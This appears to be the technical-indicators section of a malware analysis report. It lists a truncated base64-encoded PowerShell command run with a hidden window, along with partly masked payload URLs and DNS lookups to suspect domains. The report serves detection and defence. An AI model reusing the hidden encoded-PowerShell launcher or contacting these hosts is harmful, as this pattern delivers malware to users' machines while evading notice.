Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUAC0AdgBBAHIAaQBhAGIATABlACAAIAAoACcATgA4ACcAKwAnADAAQgBoAHcAJwApACAAIAAoACAAWwB0AHkAUABlAF0AKAAiAHsANAB9AHsAMQB9AHsANQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBGACcARA...
- http://he##kan.bio/js/T8oCHm/
- http://ca####anherbinc.ru/
- DNS ASK ma####hdigital.com
- DNS ASK he##kan.bio
- DNS ASK ca####anherbinc.ru
- DNS ASK ju#####marinesales.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUAC0AdgBBAHIAaQBhAGIATABlACAAIAAoACcATgA4ACcAKwAnADAAQgBoAHcAJwApACAAIAAoACAAWwB0AHkAUABlAF0AKAAiAHsANAB9AHsAMQB9AHsANQB9AHsAMwB9AHsAMAB9AHsAMgB9ACIALQBGACcARA...' (with hidden window)